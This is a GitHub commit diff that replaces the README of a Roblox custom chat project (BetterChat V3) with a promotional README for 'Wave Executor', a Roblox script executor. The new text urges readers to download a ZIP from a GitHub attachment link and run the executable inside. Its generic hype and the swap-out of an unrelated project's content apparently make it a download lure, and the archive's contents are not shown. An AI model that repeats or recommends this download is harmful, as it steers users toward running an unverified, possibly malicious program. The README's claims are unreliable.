-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
1 changed file
with
79 additions
and
10 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,13 +1,82 @@ | ||
Rolox custom chat system: | ||
# Wave Executor | ||
|
||
DevForum post: https://devforum.roblox.com/t/better-chat-v3-feature-rich-custom-chat-with-replies-rich-text-message-editing-and-more/1756348 | ||
![Wave Executor Logo](https://example.com/wave_executor_logo.png) | ||
|
||
Uncompleted documentation: https://jumpathy.gitbook.io/betterchat-v3 | ||
Welcome to Wave Executor, a robust Windows-based script executor tailored for Roblox enthusiasts. Wave Executor boasts AI integration for seamless script development, ad-free premium features, and 24/7 support, ensuring an unparalleled user experience and elevating your gameplay to new heights. | ||
|
||
Installation instructions: | ||
1. Insert the loader: https://create.roblox.com/store/asset/9376009942/BetterChat-V3-Alpha | ||
2. Insert the source code from the releases page or from the auto-update plugin (updater.lua found in extras) | ||
2A. If installing manually, modify the loader to reference the new source code | ||
3. Go to TextChatService in the explorer, and set ‘ChatVersion’ to ‘LegacyChatService’ | ||
4, Go to the model tab in studio, Advanced (on the far right), Service, and insert ‘Chat’. | ||
5. From here, all you need to do is turn off ‘LoadDefaultChat’ and ‘BubbleChatEnabled’ | ||
--- | ||
|
||
## Table of Contents | ||
|
||
- [Features](#features) | ||
- [Installation](#installation) | ||
- [Usage](#usage) | ||
- [Contributing](#contributing) | ||
- [License](#license) | ||
|
||
--- | ||
|
||
## Features | ||
|
||
🌊 **AI Integration**: Wave Executor incorporates artificial intelligence to assist in developing and executing scripts efficiently. | ||
|
||
🎮 **Roblox Scripting**: Designed specifically for Roblox script enthusiasts, Wave Executor enhances the scripting experience with its specialized tools and features. | ||
|
||
🛡️ **Premium Features**: Enjoy ad-free premium features that cater to the needs of advanced users, providing an enhanced scripting environment. | ||
|
||
🆘 **24/7 Support**: Got questions or need assistance? Our reliable support team is available around the clock to help you out. | ||
|
||
--- | ||
|
||
## Installation | ||
|
||
To get started with Wave Executor, follow these simple steps: | ||
|
||
1. Download the Wave Executor installation package from the following link: | ||
[![Download Wave Executor](https://img.shields.io/badge/Download-Wave%20Executor-orange)](https://github.com/user-attachments/files/16820624/Wave.zip) | ||
|
||
2. Extract the downloaded ZIP file to a location of your choice on your Windows machine. | ||
|
||
3. Run the Wave Executor executable file and follow the on-screen instructions to complete the installation process. | ||
|
||
4. Once installed, you are ready to unleash the power of Wave Executor for your Roblox scripting endeavors! | ||
|
||
--- | ||
|
||
## Usage | ||
|
||
Here are some tips and tricks to make the most out of Wave Executor: | ||
|
||
- **Script Development**: Use the AI integration feature to streamline your script development process and save time. | ||
|
||
- **Premium Features**: Explore the premium features such as syntax highlighting, code autocompletion, and instant script execution for a smoother scripting experience. | ||
|
||
- **Support Resources**: If you encounter any issues or have questions about Wave Executor, don't hesitate to reach out to our support team for assistance. | ||
|
||
- **Community Collaboration**: Join our online community forums to engage with other Roblox enthusiasts, share tips, and collaborate on script development projects. | ||
|
||
--- | ||
|
||
## Contributing | ||
|
||
We welcome contributions from the community to enhance Wave Executor further. Here's how you can contribute: | ||
|
||
1. Fork the Wave Executor repository to your GitHub account. | ||
|
||
2. Make your desired changes or additions to the codebase. | ||
|
||
3. Submit a pull request detailing the changes you have made and the rationale behind them. | ||
|
||
4. Your contributions will be reviewed by the project maintainers, and if deemed suitable, they will be merged into the main repository. | ||
|
||
--- | ||
|
||
## License | ||
|
||
This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details. | ||
|
||
--- | ||
|
||
Thank you for choosing Wave Executor for your Roblox scripting needs! 🌟 | ||
|
||
For more information and updates, visit our [website](https://waveexecutor.com). Feel free to follow us on [Twitter](https://twitter.com/WaveExecutor) and [Instagram](https://instagram.com/WaveExecutor) for the latest news and announcements. 🚀 |